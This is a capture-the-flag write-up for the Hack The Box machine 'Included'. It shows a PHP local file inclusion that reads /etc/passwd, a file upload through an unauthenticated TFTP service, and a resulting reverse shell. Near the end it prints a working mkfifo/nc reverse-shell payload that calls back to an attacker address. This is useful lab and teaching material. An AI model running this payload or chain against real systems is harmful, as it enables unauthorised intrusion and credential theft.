HTB Included - LFI Exploitation in PHP
Let's look into another easy box called Included. First, let's start with an nmap scan.
The -sU flag scans UDP ports. On its own it scans only UDP; add -sS (or -sT) to the same command if you also want TCP coverage in one run.
nmap -sV -sC -p- -sU -T4 include.htb
I added the IP to /etc/hosts so we do not need to remember it.
The URL parameter tells us this is a PHP application.
Here the URL parameter names home.php, which the script includes from the web root. Passing a user-controlled value straight into include() is the classic setup for LFI (Local File Inclusion): any file the web server user can read can be pulled in by giving its path in the parameter. Let's try /etc/passwd, which lists the user accounts (usernames, UIDs, home directories and shells); password hashes live in /etc/shadow, which is normally not readable by the web server user.
It works, so we have an LFI. Next we can try to escalate this to a reverse shell, which needs some way of getting PHP code onto the disk so we can include it. Here is a complete cheat sheet on exploiting LFI in PHP: CheatSheet.
The UDP part of the nmap scan takes a long time to finish. The box is running a TFTP service on port 69/udp, and port 68/udp shows up as dhcpc (the DHCP client side). What is TFTP? Trivial File Transfer Protocol is a minimal UDP-based file transfer protocol, not FTP: it has no authentication, no directory listing and no encryption, and it is typically used for PXE boot and network-device configuration, so it is frequently left wide open. Let's try to access it.
Let's verify we can actually upload files through the TFTP server. Many tftpd builds (tftpd-hpa, for example) refuse to create new files unless started with the --create option, so this is worth checking rather than assuming.
This means we can write a PHP reverse shell into the TFTP root directory and then include it through the LFI, which runs it as the web server user. If the service is tftpd-hpa, the root is set by TFTP_DIRECTORY in /etc/default/tftpd-hpa, and we can read that file through the same LFI instead of guessing. We can use https://www.revshells.com/ to generate the shell payload faster.
We got the reverse shell after uploading exploit.php and including it, with nc -lvnp 1234 listening on the attacking machine. Here are its contents:

```php
<?php
// mkfifo-based reverse shell: 10.10.14.57 is the attacker's VPN address, 1234 the listening port
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.57 1234 >/tmp/f');
?>
```
After some exploration we found mike's credentials.
We can conclude the exploration here; we already got a long way with the LFI alone. This is a successful attack scenario: an LFI escalated to shell access through an unauthenticated file write.
I am currently working on LiveAPI, which gets all your backends documented automatically (an AI-based solution); do give it a try.